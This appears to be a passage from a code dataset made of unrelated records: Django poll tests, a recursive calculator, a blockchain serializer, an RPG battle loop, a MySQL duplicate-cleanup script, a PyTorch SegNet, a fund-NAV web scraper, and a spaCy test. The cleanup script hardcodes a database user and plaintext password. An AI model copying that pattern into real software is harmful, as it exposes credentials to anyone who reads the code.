test_deserialize_missing_availability(self):\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n }\n expected_error = {'availability': [ErrorDetail(string='This field is required.', code='required')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_validate_update_wrong_poll(self):\n self.test_poll2 = createTestPoll()\n participant = self.test_poll.participants.first()\n updated_participant_data = {\n \"id\": participant.id,\n \"poll\": self.test_poll2.id, # Wrong poll ID\n \"name\": participant.name,\n \"availability\": [\n {\"polltime\": availability.polltime.id, \"availability\": availability.availability} \n for availability in participant.availability.all()] \n }\n expected_error = {'poll': [ErrorDetail(string='Provided poll does not match poll currently associated with participant', code='invalid')]}\n serializer = ParticipantSerializer(participant, data = updated_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_validate_wrong_nr_polltimes(self):\n polltime = self.test_poll.polltimes.first()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [{ \"polltime\": polltime.id, \"availability\": \"Y\"}] # Only one polltime\n }\n expected_error = {'availability': [ErrorDetail(string='Participant availability contains incorrect number of poll times', code='invalid')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_validate_polltimes_wrong_order(self):\n polltimes = self.test_poll.polltimes.all()\n npolltimes = len(polltimes)\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltimes[i].id, \"availability\": \"Y\"}\n for i in list(range(1, npolltimes)) + [0]] # Move the 1st polltime at the end\n }\n expected_error = {'availability': [ErrorDetail(string='Participant availability contains the wrong poll times, or in the wrong order', code='invalid')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_create_participant(self):\n nparticipants = len(self.test_poll.participants.all())\n polltimes = self.test_poll.polltimes.all()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltime.id, \"availability\": \"Y\"} \n for polltime in polltimes] \n }\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertTrue(serializer.is_valid())\n serializer.save()\n updated_participants = list(self.test_poll.participants.all())\n assert(len(updated_participants) == nparticipants+1)\n new_participant = updated_participants[-1]\n assert(new_participant.name == new_participant_data[\"name\"])\n\n def test_update_participant(self):\n participants = self.test_poll.participants.all() \n nparticipants = len(participants)\n participant = participants[0]\n updated_participant_data = {\n \"id\": participant.id,\n \"poll\": participant.poll.id,\n \"name\": \"Updated name\",\n \"availability\": [\n {\"polltime\": availability.polltime.id, \"availability\": \"Y\"} \n for availability in participant.availability.all()] \n }\n serializer = ParticipantSerializer(participant, data = updated_participant_data)\n self.assertTrue(serializer.is_valid())\n serializer.save()\n updated_participants = list(self.test_poll.participants.all())\n assert(len(updated_participants) == nparticipants)\n updated_participant = updated_participants[0]\n assert(updated_participant.name == updated_participant_data[\"name\"])\n assert(updated_participant.availability.first().availability == updated_participant_data[\"availability\"][0][\"availability\"])\n\nclass PollSerializerTests(TestCase):\n def test_create_poll(self):\n new_poll_data = {\n 'name': 'TestPoll1',\n 'location': 'TestLocation1',\n 'notes': 'TestNotes1',\n 'timezone': 'TestTimezone1',\n 'polltimes': [\n {'start': '2018-05-02T00:56:00Z', 'end': '2018-05-02T01:56:00Z'},\n {'start': '2018-05-03T00:56:00Z', 'end': '2018-05-03T01:56:00Z'},\n {'start': '2018-05-04T00:56:00Z', 'end': '2018-05-04T01:56:00Z'}],\n }\n author = createTestAuthor()\n request = RequestFactory().get(\"/\")\n request.user = author\n serializer = PollSerializer(data = new_poll_data, context={\"request\": request})\n self.assertTrue(serializer.is_valid())\n poll = serializer.save()\n self.assertEqual(poll.name, new_poll_data[\"name\"])\n\nclass ParticipatePollViewTests(TestCase):\n\n def setUp(self):\n self.test_poll = createTestPoll()\n self.url = reverse('participate-poll', args=[self.test_poll.id])\n\n def test_post_request_not_json(self):\n test_data = \"Not a JSON\"\n expected_response = {\"detail\": \"Request not valid JSON\"}\n response = self.client.post(self.url, data=test_data, content_type=\"application/json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(json.loads(response.content), expected_response)\n\n def test_post_wrong_nr_polltimes(self):\n polltime = self.test_poll.polltimes.first()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [{ \"polltime\": polltime.id, \"availability\": \"Y\"}] # Only one polltime\n }\n expected_response = {'availability': [ErrorDetail(string='Participant availability contains incorrect number of poll times', code='invalid')]}\n response = self.client.post(self.url, data=new_participant_data, content_type=\"application/json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(json.loads(response.content), expected_response)\n\n def test_post_polltimes_wrong_order(self):\n polltimes = self.test_poll.polltimes.all()\n npolltimes = len(polltimes)\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltimes[i].id, \"availability\": \"Y\"}\n for i in list(range(1, npolltimes)) + [0]] # Move the 1st polltime at the end\n }\n expected_response = {'availability': [ErrorDetail(string='Participant availability contains the wrong poll times, or in the wrong order', code='invalid')]}\n response = self.client.post(self.url, data=new_participant_data, content_type=\"application/json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(json.loads(response.content), expected_response)\n\n def test_post_success(self):\n nparticipants = len(self.test_poll.participants.all())\n polltimes = self.test_poll.polltimes.all()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltime.id, \"availability\": \"Y\"} \n for polltime in polltimes] \n }\n response = self.client.post(self.url, data=new_participant_data, content_type=\"application/json\")\n assert(response.status_code == status.HTTP_200_OK)\n updated_participants = list(self.test_poll.participants.all())\n assert(len(updated_participants) == nparticipants+1)\n new_participant = updated_participants[-1]\n assert(new_participant.name == new_participant_data[\"name\"])\n","sub_path":"polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"404939266","text":"'''\n一个自解析字符串的计算器\n'''\n\n\ndef isnum(word):\n return word in '0123456789'\n\ndef issyb(word):\n return word in '+-*/()'\n\ndef parse(words):\n wordsl=[]\n conn=0\n if len(words)<=1:\n return words\n for i in range(len(words)):\n if isnum(words[i]):\n if i ==0 or issyb(words[i-1]):\n conn=i\n if i==len(words)-1 or issyb(words[i+1]):\n wordsl.append(int(words[conn:i+1]))\n\n if words[i]=='-' and issyb(words[i-1]):\n wordsl.append(words[i])\n\n elif issyb(words[i]):\n wordsl.append(words[i])\n return wordsl\n\ndef calculator(wordsl):\n #整数直接返回\n if len(wordsl)==1:\n return wordsl[0]\n\n # 去括号\n for i in range(len(wordsl)):\n if wordsl[i]=='(':\n for j in range(len(wordsl)-1,0,-1):\n if wordsl[j]==')':\n wordsl[i:j+1]=[calculator(wordsl[i+1:j])]\n return calculator(wordsl)\n # 取负\n for i in range(len(wordsl)):\n if i==0 and wordsl[i]=='-' or issyb(str(wordsl[i-1])) and wordsl[i]=='-':\n wordsl[i:i+2]=[-wordsl[i+1]]\n return calculator(wordsl)\n\n\n #4则运算\n if wordsl[1] == '+':\n return wordsl[0]+calculator(wordsl[2:])\n elif wordsl[1] == '-':\n return wordsl[0]-calculator(wordsl[2:])\n elif wordsl[1] == '/':\n wordsl[:3]=[wordsl[0]/wordsl[2]]\n return calculator(wordsl)\n elif wordsl[1]=='*':\n wordsl[:3]=[wordsl[0]*wordsl[2]]\n return calculator(wordsl)\n\nwordsl=parse('((2+2)/4)/-2')\nprint(wordsl)\n\nprint(calculator(wordsl))\n\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287906684","text":"from . import BlockHeader, BlockBody\nfrom .. import Block, v0_1a\n\n\nclass BlockSerializer(v0_1a.BlockSerializer):\n version = BlockHeader.version\n BlockHeaderClass = BlockHeader\n BlockBodyClass = BlockBody\n\n def _serialize(self, block: 'Block'):\n header: BlockHeader = block.header\n block_serialized = super()._serialize(block)\n block_serialized[\"next_leader\"] = header.next_leader.hex_xx()\n return block_serialized\n","sub_path":"loopchain/blockchain/blocks/v0_2/block_serializer.py","file_name":"block_serializer.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"301111907","text":"import json\nfrom .combates.melee import melee\nfrom .combates.magical import magical\nfrom .combatentes import createcombatentes\nfrom ..funcoes.useit import useitem\nfrom ..funcoes.lvlup import lvlup\nfrom .loot import lootar\nfrom ..funcoes.restore import restaurar\n\ndef batalha():\n createcombatentes()\n with open('Beta/data/combatentes.json') as f:\n nomes=json.load(f)\n\n with open('Beta/data/nomes.json') as jo:\n jogadores=json.load(jo)\n\n with open('Beta/data/inventario/armas.json') as h:\n armas=json.load(h)\n\n with open('Beta/data/inventario/armadura.json') as p:\n armadura=json.load(p)\n \n with open('Beta/data/inventario/escudos.json') as q:\n escudos=json.load(q)\n #for pessoa in nomes:\n # print('Nome: ',pessoa,'seus itens:')\n # print(nomes.get(pessoa).get('inventario').get('itens'))\n # print(nomes.get(pessoa).get('inventario').get('gold'))\n n=[]\n v=[]\n i=[]\n a=[]\n q=[]\n auxq=[]\n v2=[]\n a2=[]\n for z in nomes:\n ldva=nomes.get(z).get('inventario').get('arma')\n dva=ldva[0]\n ldvam=nomes.get(z).get('inventario').get('armadura')\n dvam=ldvam[0]\n ldve=nomes.get(z).get('inventario').get('escudo')\n dve=ldve[0]\n if dva in armas: dvat=armas.get(dva).get('int_VEL')\n else: dvat=0\n if dvam in armadura: dvamt=armadura.get(dvam).get('int_VEL')\n else: dvamt=0\n if dve in escudos: dvet=escudos.get(dve).get('int_VEL')\n else: dvet=0\n debuff_vel=dvat+dvamt+dvet\n n.append(z)\n u=nomes.get(z).get('velocidade')+debuff_vel\n u2=(2.71828**((0.0423*u+0.0423)))\n v.append(u)\n v2.append(u)\n i.append(u2)\n a.append(u2)\n if int(u2)<1: q.append(1)\n else: q.append(int(u2))\n a2.append(int(u2))\n auxq.append(int(u2))\n u=0\n u2=0\n v.sort(reverse=True)\n x='s'\n aux=2\n nomedef=z\n print('Combatentes:',n)\n na='0'\n combatentesleft=len(n)\n end=False\n lenn=len(n)\n while x=='s' or x=='sim':\n na=[]\n while u20:# and nm not n[u]:\n print(' ',nm,'/',nomes.get(nm).get('hp'),'of',nomes.get(nm).get('chp')*15,'de vida')\n #print('\\n')\n print('Vez de',n[u],'(',q[u],'ações )')\n action=0\n #print('\\nu:',u)\n #print('\\nu2:',u2)\n #print('\\ni:',i)\n #print('\\nq:',q)\n #print('\\na:',a)\n #print('\\na2:',a2)\n #print('\\nv:',v)\n #print('\\nv2:',v2)\n #print('\\nauxq:',auxq)\n while action=1: auxq[u]=q[u] \n else: auxq[u]=1\n u+=1\n u=0\n auxq.sort()\n while u0:\n if cmana+mana>cmana*15: nomes[per]['mana']=cmana*15\n else: nomes[per]['mana']+=cmana\n while True:\n if end: x='n'\n else: x=input('Deseja continuar o combate?')\n if x=='loot' or x=='lootar' or x=='l' or x=='s' or x=='sim' or x=='n' or x=='nao': break\n else: print('Essa opção não existe')\n xptotal=0\n if x=='loot' or x=='lootar' or x=='l': lootar()\n print('Deseja restaurar os jogadores?')\n res=input()\n for monstro in nomes:\n if not monstro in jogadores and nomes.get(monstro).get('hp')<1:\n xptotal+=nomes.get(monstro).get('dropxp')\n for per in jogadores:\n if x=='loot' or x=='l': jogadores[per]['inventario']=nomes.get(per).get('inventario')\n if res=='s': restaurar(per,'f',1)\n lvlup(xptotal,per,2)\n nomes={}\n with open('Beta/data/combatentes.json','w') as f:\n json.dump(nomes,f)\n return(n) \n","sub_path":"Sistema/scripts/batalha/iniciativa.py","file_name":"iniciativa.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"981500","text":"#评论数据库后台操作操作包括:\n#从jd_%分类表里获得爬虫任务表中不存在的sku.\n#脚本是原来写的就不详细叙述了.\n# 分隔任务:\n# 1.将is_init=1的,sku找到每个sku的最新生成的任务的时间(start_time最大的),然后设置新建一条记录,start_time,post_time,end_time,page,is_init,error_frequency都要被设置。\n# 合并任务:\n# 1.status为=2的时候表示任务完成。那么合并的策略是从前面扫描。如果某个时间是完成的,那么直接将它后面的start_time=已经完成的这个start_time,并将当前的这个删除。\n# 清除超时任务:\n# 1.检查任务是否超时(task_time),如果超时,将is_employ置为0。\n\n\n#备注,任务基本完成\n\nimport pymysql\nimport time\nimport datetime\n\n\n\nimport pymysql\n\nSKU_TASK_TABLE = 'jd_comment_task'\nDATA_BASE_NAME='qfliu_db'\nimport traceback\n# 'qfliu_db'\n\n\ntry:\n mysql_conn = pymysql.connect(host='192.168.0.210', user='qfliu', passwd='333333', db=DATA_BASE_NAME, charset='utf8',\n connect_timeout=5000)\n cur=mysql_conn.cursor()\n mysql_conn.commit()\n cur.execute(\"select `sku` from %s.%s group by `sku` having count(`sku`)>1\" %(DATA_BASE_NAME,SKU_TASK_TABLE))\n skus=cur.fetchall()\n skus_len=len(skus)\n #生成新任务\n for i,sku in enumerate(skus):\n print(\".....................sku num=%s..............sku zongnumber=%s...............\" %(i,skus_len))\n sku=sku[0]\n cur.execute('SET SQL_SAFE_UPDATES=0;')\n cur.execute(\n \"select `id` from %s.%s \"\n \"where `id`=(select min(`id`) from %s.%s where sku='%s');\" % (DATA_BASE_NAME,SKU_TASK_TABLE,DATA_BASE_NAME,SKU_TASK_TABLE,sku)\n )\n infor=cur.fetchall()\n id=infor[0][0]\n cur.execute(\"delete from %s.%s where `sku`='%s' and `id` != %s;\" %(DATA_BASE_NAME,SKU_TASK_TABLE,sku,id))\n cur.execute('SET SQL_SAFE_UPDATES=1;')\n mysql_conn.commit()\n cur.close()\n mysql_conn.close()\nexcept Exception as e:\n traceback.print_exc(file='log_commit.log')","sub_path":"my_script/jd_commit_script/tmp_clear.py","file_name":"tmp_clear.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"424613527","text":"\"\"\"\nThis is not an implementation for\nSegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation\n\nI'll change the file names later\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass encoder(nn.Module):\n '''\n Encoder for the Segmentation network\n '''\n\n def __init__(self, batchNorm_momentum):\n super(encoder, self).__init__()\n self.main = nn.Sequential(\n nn.Conv2d(3, 64, 4, 2, 1, dilation=2, bias=False),\n # nn.BatchNorm2d(64, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(64, 128, 4, 2, 1, dilation=2, bias=False),\n nn.BatchNorm2d(128, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(128, 256, 4, 2, 1, dilation=2, bias=False),\n nn.BatchNorm2d(256, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(256, 512, 4, 2, 1, dilation=2, bias=False),\n nn.BatchNorm2d(512, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(512, 1024, 4, 1, 0, dilation=2, bias=False),\n nn.BatchNorm2d(1024, momentum=batchNorm_momentum),\n nn.ReLU(True)\n )\n\n def forward(self, input):\n output = self.main(input)\n return output\n\nclass decoder(nn.Module):\n '''\n Decoder for the Segmentation Network\n '''\n\n def __init__(self, batchNorm_momentum, num_classes=19):\n super(decoder, self).__init__()\n self.main = nn.Sequential(\n nn.ConvTranspose2d(1024, 512, 4, 1, 0, bias=False),\n nn.BatchNorm2d(512, momentum=batchNorm_momentum),\n nn.Dropout2d(),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(512, 256, 4, 2, 1, bias=False),\n nn.BatchNorm2d(256, momentum=batchNorm_momentum),\n nn.Dropout2d(),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),\n nn.BatchNorm2d(128, momentum=batchNorm_momentum),\n nn.Dropout2d(),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(128, 64, 4, 2, 1, bias=False),\n nn.BatchNorm2d(64, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(64, num_classes, 4, 2, 1, bias=False),\n nn.Softmax(dim=1)\n )\n\n def forward(self, input):\n output = self.main(input)\n return output\n\nclass SegNet(nn.Module):\n '''\n Segnet network\n '''\n\n def __init__(self, batchNorm_momentum, num_classes):\n super(SegNet, self).__init__()\n self.encoder = encoder(batchNorm_momentum)\n self.decoder = decoder(batchNorm_momentum, num_classes)\n\n def forward(self, x):\n latent = self.encoder(x)\n print('Latent Shape')\n print(latent.shape)\n output = self.decoder(latent)\n\n return output\n\n def dice_loss(self, output, target, weights=None, ignore_index=None):\n '''\n output : NxCxHxW Variable\n target : NxHxW LongTensor\n weights : C FloatTensor\n ignore_index : int index to ignore from loss\n '''\n eps = 0.0001\n\n encoded_target = output.detach() * 0\n if ignore_index is not None:\n mask = target == ignore_index\n target = target.clone()\n target[mask] = 0\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n mask = mask.unsqueeze(1).expand_as(encoded_target)\n encoded_target[mask] = 0\n else:\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n\n if weights is None:\n weights = 1\n\n intersection = output * encoded_target\n numerator = 2 * intersection.sum(0).sum(1).sum(1)\n denominator = output + encoded_target\n\n if ignore_index is not None:\n denominator[mask] = 0\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = weights * (1 - (numerator / denominator))\n\n return loss_per_channel.sum() / output.size(1)\n","sub_path":"model/segnet.py","file_name":"segnet.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587491177","text":"import re\nimport urllib.parse\nimport json\nfrom scrapy import Request\nfrom FundNavSpiders import GGFundNavItem\nfrom FundNavSpiders import GGFundNavSpider\nfrom datetime import datetime\nfrom urllib.parse import urljoin\nfrom scrapy.utils.response import get_base_url\n\n\n\nclass UrichInvestSpider(GGFundNavSpider):\n name = 'FundNav_UrichInvest'\n sitename = '佑瑞持'\n channel = '投顾净值'\n allowed_domains = ['urich.cn']\n start_urls = ['http://www.urich.cn/']\n\n def __init__(self, limit=None, *args, **kwargs):\n super(UrichInvestSpider, self).__init__(limit, *args, **kwargs)\n\n def start_requests(self):\n\n yield Request(url='http://www.urich.cn/Risk.asp?temp=200', callback=self.parse)\n\n def parse(self, response):\n\n fps = [\n {\n 'url': 'http://www.urich.cn/product.asp',\n 'ref':'http://www.urich.cn/Risk.asp?temp=200'\n }\n ]\n\n yield self.request_next(fps, [])\n\n def parse_fund(self, response):\n fps = response.meta['fps']\n ips = response.meta['ips']\n ext = response.meta['ext']\n\n trs = response.xpath(\"//table[@class='pr_view']/tr\")\n for tr in trs[1:]:\n url = tr.xpath(\"./td[last()]/a/@href\").extract_first()\n if url != ''and url is not None:\n if 'http://www.ccbtrust.com.cn/templates/second/index.aspx?nodeid=15&page=ContentPage&' not in url:\n ips.append({\n 'url': url,\n 'ref': 'http://www.urich.cn/product.asp',\n })\n\n yield self.request_next([], ips)\n\n def parse_item(self, response):\n fps = response.meta['fps']\n ips = response.meta['ips']\n ext = response.meta['ext']\n fund_name = ''\n url = response.url\n if 'https://www.bjitic.com/sun_info-49-52.html' in url:\n content_name = response.xpath('//div[@class=\"item\"]/div[2]/text()').extract_first()\n fund_name = content_name.split(':')[1]\n dataList = response.xpath('//div[@class=\"qmm_lb\"]/table/tr')\n for data in dataList[1:]:\n item = GGFundNavItem()\n item['sitename'] = self.sitename\n item['channel'] = self.channel\n item['url'] = response.url\n\n item['fund_name'] = fund_name\n\n statistic_date = data.xpath('./td[1]/text()').extract_first()\n statistic_date = str(statistic_date).split(\" \")[0] if statistic_date is not None else None\n statistic_date = datetime.strptime(statistic_date, '%Y-%m-%d')\n item['statistic_date'] = statistic_date\n\n nav = data.xpath('./td[2]/text()').extract_first()\n nav = re.search(r'([0-9.]+)', str(nav))\n nav = nav.group(0) if nav is not None else None\n item['nav'] = float(nav)/10000 if nav is not None else None\n\n added_nav = data.xpath('./td[3]/text()').extract_first()\n added_nav = re.search(r'([0-9.]+)', str(added_nav))\n added_nav = added_nav.group(0) if added_nav is not None else None\n item['added_nav'] = float(added_nav)/10000 if added_nav is not None else None\n\n yield item\n\n if 'https://mall.essence.com.cn/mall/views/financial/detail' in url:\n fund_code = url.rsplit('/',1)[1].split('.')[0]\n fund_name = response.xpath('//div[@class=\"lc_b2 reset_lc_b2\"]/b/text()').extract_first()\n url = 'https://mall.essence.com.cn/servlet/json?funcNo=1000055&product_code='+fund_code+'&numPerPage=10&start_date=&end_date=&fund_type=0&page=1'\n ips.append({\n 'url': url,\n 'ref': 'https://mall.essence.com.cn/mall/views/financial/detail/'+fund_code+'.html',\n 'ext':{'financial':'financial','fund_name':fund_name,'fund_code':fund_code}\n })\n\n if 'financial' in ext:\n fund_name = ext['fund_name']\n fund_code = ext['fund_code']\n totalRows = json.loads(response.text)['results'][0]['totalRows']\n url = 'https://mall.essence.com.cn/servlet/json?funcNo=1000055&product_code=' + str(fund_code) + '&page=1&start_date=&end_date=&fund_type=0&numPerPage=' + str(totalRows)\n ips.append({\n 'url': url,\n 'ref': 'https://mall.essence.com.cn/mall/views/financial/detail/' + str(fund_code) + '.html',\n 'ext': {'financialList': 'financialList', 'fund_name': fund_name, 'fund_code': fund_code}\n })\n\n if 'financialList' in ext:\n fund_name = ext['fund_name']\n fund_code = ext['fund_code']\n datas = json.loads(response.text)['results'][0]['data']\n for data in datas:\n item = GGFundNavItem()\n item['sitename'] = self.sitename\n item['channel'] = self.channel\n item['url'] = response.url\n\n item['fund_name'] = fund_name\n\n statistic_date = data['nav_date']\n #self.logger.info('statistic_date:'+statistic_date)\n statistic_date = str(statistic_date).split(\" \")[0] if statistic_date is not None else None\n statistic_date = datetime.strptime(statistic_date, '%Y-%m-%d')\n item['statistic_date'] = statistic_date\n\n nav = data['nav']\n #self.logger.info('nav:' + nav )\n nav = re.search(r'([0-9.]+)', str(nav))\n nav = nav.group(0) if nav is not None else None\n item['nav'] = float(nav) / 10000 if nav is not None else None\n\n added_nav = data['cumulative_net']\n #self.logger.info('added_nav:' + added_nav)\n added_nav = re.search(r'([0-9.]+)', str(added_nav))\n added_nav = added_nav.group(0) if added_nav is not None else None\n item['added_nav'] = float(added_nav) / 10000 if added_nav is not None else None\n\n yield item\n\n if 'http://www.ciit.com.cn/xingyetrust-web/netvalues/netvalue!getHistoryNetValue' in url:\n url = response.url\n fund_name = url.rsplit('=',1)[1]\n fund_name = urllib.parse.unquote(fund_name)\n fund_url = 'http://www.ciit.com.cn/funds-struts/fund-net-chart-table/XY056X?from=&to=&page=1-16'\n ips.append({\n 'url': fund_url,\n 'ref': 'http://www.ciit.com.cn/xingyetrust-web/netvalues/netvalue!getHistoryNetValue?fundCode=XY056X&fundname=%E5%85%B4%E4%B8%9A%E4%BF%A1%E6%89%98%C2%B7%E4%BD%91%E7%91%9E%E6%8C%81%E4%BC%98%E4%BA%AB%E7%BA%A2%E5%88%A9%E8%AF%81%E5%88%B8%E6%8A%95%E8%B5%84%E9%9B%86%E5%90%88%E8%B5%84%E9%87%91%E4%BF%A1%E6%89%98%E8%AE%A1%E5%88%92',\n 'ext': {'HistoryNetValue': 'HistoryNetValue', 'fund_name': fund_name}\n })\n\n if 'HistoryNetValue' in ext:\n fund_name = ext['fund_name']\n last_url = response.xpath('//div[@class=\"dtitle_t\"]/table/tr/td[2]/a[last()]/@href').extract_first()\n href = urljoin(get_base_url(response), last_url)\n last_page = href.rsplit('=',1)[1].split('-')[0]\n fund_url = href.rsplit('=',1)[0]\n for page in range(1, int(last_page) + 1):\n url = fund_url + '=' + str(page) + '-16'\n ips.append({\n 'url': url,\n 'ref': 'http://www.ciit.com.cn/xingyetrust-web/netvalues/netvalue!getHistoryNetValue?fundCode=XY056X&fundname=%E5%85%B4%E4%B8%9A%E4%BF%A1%E6%89%98%C2%B7%E4%BD%91%E7%91%9E%E6%8C%81%E4%BC%98%E4%BA%AB%E7%BA%A2%E5%88%A9%E8%AF%81%E5%88%B8%E6%8A%95%E8%B5%84%E9%9B%86%E5%90%88%E8%B5%84%E9%87%91%E4%BF%A1%E6%89%98%E8%AE%A1%E5%88%92',\n 'ext': {'HistoryNetValueList': 'HistoryNetValueList', 'fund_name': fund_name}\n })\n\n if 'HistoryNetValueList' in ext:\n fund_name = ext['fund_name']\n datas = response.xpath('//table[@class=\"table2\"]/tr')\n for data in datas[1:]:\n item = GGFundNavItem()\n item['sitename'] = self.sitename\n item['channel'] = self.channel\n item['url'] = response.url\n\n item['fund_name'] = fund_name\n\n statistic_date = data.xpath('./td[1]/text()').extract_first()\n statistic_date = str(statistic_date).split(\" \")[0] if statistic_date is not None else None\n statistic_date = datetime.strptime(statistic_date, '%Y-%m-%d')\n item['statistic_date'] = statistic_date\n\n nav = data.xpath('./td[2]/text()').extract_first()\n nav = re.search(r'([0-9.]+)', str(nav))\n nav = nav.group(0) if nav is not None else None\n item['nav'] = float(nav) / 10000 if nav is not None else None\n\n yield item\n\n yield self.request_next(fps, ips)","sub_path":"FundNavSpiders/UrichInvest.py","file_name":"UrichInvest.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572051627","text":"\n\n#calss header\nclass _WAGER():\n\tdef __init__(self,): \n\t\tself.name = \"WAGER\"\n\t\tself.definitions = [u'an amount of money that you risk in the hope of winning more, by trying to guess something uncertain, or the agreement that you make to take this risk: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_wager.py","file_name":"_wager.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608841032","text":"\nfrom conftest import MY_PREAMBLE\n\ndef test_spacy_parts_of_speech(nlp):\n doc = nlp(\"Hello World!!!\") #> \n assert [str(token) for token in doc] == [\"Hello\", \"World\", \"!\", \"!\", \"!\"]\n assert [token.pos_ for token in doc] == ['INTJ', 'PROPN', 'PUNCT', 'PUNCT', 'PUNCT']\n\n doc = nlp(MY_PREAMBLE) #> \n assert [str(token) for token in doc] == [\n 'Friends', ',', 'Romans', ',', 'countrymen', ',',\n 'lend', 'me', 'your', 'ears', ';', '911'\n ]\n assert [token.pos_ for token in doc] == [\n 'NOUN', 'PUNCT', 'PROPN', 'PUNCT', 'NOUN', 'PUNCT',\n 'VERB', 'PRON', 'PRON', 'NOUN', 'PUNCT', 'NUM'\n ]\n","sub_path":"test/parts_of_speech_test.py","file_name":"parts_of_speech_test.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78237620","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport time\n\nclass TrainerNN:\n '''\n The base class for training neural networks. It provides the basic wiring and commonly shared code. Inherited\n classes should override the following methods:\n\n - _create_placeholders()\n - _create_model()\n - _create_feed_dictionary()\n\n The inherited class is used by calling the following two methods:\n - create_net()\n - train()\n\n '''\n\n def __init__(self):\n self.modes = ['train', 'validation']\n self.summary_writer = None\n\n def get_num_of_trainable_variables(self):\n '''\n This is very useful for sanity checking. If you have a wrong idea of how many variables you are using,\n something is very wrong (with you or with the code).\n :return: number of *trainable* variables in the graph\n '''\n return np.sum([np.prod(v.shape) for v in tf.trainable_variables()])\n\n ################################################################################################################\n #\n # THE FOLLOWING THREE METHODS SHOULD BE OVERRIDDEN IN SUBCLASSES\n #\n ################################################################################################################\n\n def _create_placeholders(self):\n pass\n\n def _create_model(self, arch):\n pass\n\n def _create_feed_dictionary(self, batch, is_training):\n pass\n\n ################################################################################################################\n #\n # THE USUAL STUFF\n #\n ################################################################################################################\n\n def _create_loss(self):\n with tf.name_scope('loss'):\n self.labels = tf.one_hot(self.y, 2)\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=self.labels, logits=self.logits))\n\n def _create_prediction(self):\n with tf.name_scope('prediction'):\n self.prediction = tf.to_int32(tf.argmax(self.logits, axis=1))\n\n def _calculate_f1_score(self):\n '''\n F1 score is used instead of accuracy in case of strongly biased classes. Google it up :)\n :return: F1 score, what else?!?\n '''\n with tf.name_scope('stats'):\n prediction = self.prediction\n y = self.y\n with tf.name_scope('true_positive'):\n tp = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.equal(prediction, y), tf.equal(prediction, 1))))\n with tf.name_scope('true_negative'):\n tn = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.equal(prediction, y), tf.equal(prediction, 0))))\n with tf.name_scope('false_positive'):\n fp = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.not_equal(prediction, y), 